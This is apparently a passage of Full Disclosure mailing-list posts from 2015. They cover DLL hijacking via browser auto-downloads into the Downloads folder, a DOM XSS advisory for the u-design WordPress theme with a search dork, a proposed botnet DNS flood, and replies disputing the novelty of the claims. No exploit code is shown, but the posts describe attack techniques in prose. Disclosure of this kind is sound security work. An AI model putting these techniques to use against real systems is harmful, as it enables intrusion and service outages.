On Fri, Oct 2, 2015 at 6:43 PM, Haifei Li  wrote:
>
>
>
>
>
>
> This is a copied version of my blog post, original version 
> http://justhaifei1.blogspot.com/2015/10/watch-your-downloads-risk-of-auto.html.Probably
>  it's commonly known that when you try to download something on your modern 
> browser e.g. Google Chrome or Microsoft Edge, the file will be downloaded 
> automatically to your local system with just a simple clicking - no need for 
> additional confirmations. With default settings, the file will be downloaded 
> to your "Downloads" folder ("C:\Users\\Downloads").
> Personally, I have worried about this feature quite some times, now I finally 
> got some time on highlighting this. (Please tell me if there's someone 
> already talked about this, I quickly googled around and wasn’t able to find 
> an appropriate one, I think it should be known by many ppl).
>
> The "auto-download" feature is good from “user experience” perspective, but 
> obviously it's not good for security, as the downloading could also be 
> started by Javascript (). The attacker may just place a 
> malicious DLL with a specific name into the "Downloads" folder when the 
> victim visits a webpage he/she controls. In future, when the victim tries to 
> download/install good programs (executables) from legitimate websites - of 
> course, the good executable will be downloaded, and will be launched from the 
> "Downloads" folder as well - then the installation/execution progress could 
> be hijacked.
>
> This is because that in the real world, most executables replying dlls. 
> Anyway, the "application directory" is the very first place in the search 
> order when searching/loading for a dll (yoy may want to check this paper I 
> released years ago). So, probably, most of dlls even the system dlls could be 
> hijacked when you place a same-named dll in the executable’s directory, and 
> that's not for the situation that the searching dll is not in anywhere of 
> your system.
>
> Usually, the "Downloads" folder is a place with massive downloaded files, so 
> the victim probably never get a change to realize there is a malicious DLL 
> sitting in his/her "Downloads" folder. I’d also doubt that even a normal user 
> notices a strange dll in his/her "Downloads" folder, does he/she will really 
> delete it immediately? DLLs won’t be executed by themselves anyway, right?
>
> Anyway, in the real world, for most people, who really check their 
> "Downloads" folder every time when they try to install something from 
> internet? Instead, most people just click the "Run" button directly when 
> installing something (see following figure).
>
>
>
>
> I have quickly made a video showing this risk. The test environment is 
> Windows 10 Pro, with Microsoft Edge and Google Chrome, fully updated as of 
> Oct 2nd, 2015, all with default settings. Check it out here.
>
>
> As you may have noted, a modified “VERSION.DLL” will be dropped into the 
> “Downloads” folder when visiting the webpage 
> https://dl.dropboxusercontent.com/u/14747595/auto_download_test/test.html. 
> Then, when the user tries to install Adobe Reader from the official adobe.com 
> website, the installation process of Adobe Reader will be hijacked - the 
> modified “VERSION.DLL” will be loaded and my shellcode will be executed.
>
> There’s one small thing, the code execution should be run out of the browser 
> sandbox, but unluckily the tested shellcode I copied from internet runs 
> calc.exe, and because there’s no calc.exe anymore on Windows 10, what you’ve 
> seen it’s just a Calculator App which runs within the App Container sandbox. 
> Other shellcode, for example, running notepad.exe, will be run out of the App 
> Container sandbox and give the attacker control of your system. 
> #BringTheLovelyCalcBackMicrosoft!
>
> Also note that with default setting, the Microsoft Edge will promote a 
> warning dialog saying the DLL is dangerous, offer

[FD] u-design wordpress theme DOM XSS

[Kenan Gms]

u-desing is a wordpress theme prone to DOM XSS vulnerability.

Vendor url:
http://themeforest.net/item/udesign-responsive-wordpress-theme/253220

versions between 2.7.9 – (Updated: 08.05.2015) and 2.3.0 – (Updated:
04.02.2014 - there are 40 of them) are vulnerable to DOM XSS which can be
exploited by adding # to the end of the url.

Vendor already patched the vulnerability on higher versions, but there are
still a lot of people/companies are using vulnerable ones.

Dork: inurl:/wp-theme/u-design/
You can check the version from: /wp-content/themes/u-design/style.css
CVE Reference: CVE-2015-7357
Author: @K3n4nG

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] DDos Attack To Drop The Internet

[Jeffrey Roberts]

If you were to have a botnet which were to flood random DNS queries
for domains that did not exist to the list of DNS servers hosted on
http://public-dns.tk/nameservers-all.txt then the root dns servers and
the tld dns servers would be overwhelmed without any way to filter the
packets, if they were to filter the packets of the DNS servers, they
themselves would be turning off DNS, hence they can not do that... If
the botnet only hits the DNS servers on the list a few times,
filtering those packets would be insignificant. This attack should in
essence turn off DNS for the world, hence, turning off the internet as
the public knows it today.

-- 
- Jeff

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Watch your Downloads: the risk of the "auto-download" feature on Microsoft Edge and Google Chrome

[Stefan Kanthak]

"Haifei Li"  wrote:

> This is a copied version of my blog post, original version
> http://justhaifei1.blogspot.com/2015/10/watch-your-downloads-risk-of-auto.html.
> Probably it's commonly known that when you try to download
> something on your modern browser e.g. Google Chrome or
> Microsoft Edge, the file will be downloaded automatically to
> your local system with just a simple clicking - no need for
> additional confirmations. With default settings, the file
> will be downloaded to your "Downloads" folder
> ("C:\Users\\Downloads").
> Personally, I have worried about this feature quite some times,
> now I finally got some time on highlighting this. (Please tell
> me if there's someone already talked about this,

Of course somebody wrote and talked about this already:







> I quickly googled around and wasn't able to find an appropriate
> one, I think it should be known by many ppl).

You can read a little bit more about this weakness and the resulting
vulnerabilities on 

stay tuned
Stefan

JFTR:  is HTML, not JavaScript.

  JavaScript is also not necessary to redirect to the download
  page of some morons who still expect their unsuspecting users
  to download and RUN an *.EXE to install their soft^Wcrapware:
  1.  exists;
  2. Windows' native package format is *.MSI!

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] WinRAR SFX v5.21 - Remote Code Execution Vulnerability

[Stefan Kanthak]

"Gynvael Coldwind"  wrote:

> Correct me if I'm wrong, but the vulnerability can be summarized as: if you
> run an untrusted .exe you might execute malicious code?

Amen!

> I hardly see this as giving anything new to the attacker who can just
> create a malicious exe file, set the winrar sfx icon and send it to the
> victim.

That's why giving unsuspecting users *.EXE to install a software package
or to unpack an archive and thus training them to run almost anything
they get their hands on is a BLOODY STUPID idea in the first place.

ALWAYS use the platforms native package or archive formats to distribute
your software or files!

> Keep in mind that not every unexpected behavior or software bug is a
> security vulnerability.
> 
> (and no, potential AV bypass doesn't make it a vulnerability either)

Right again.

stay tuned
Stefan

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/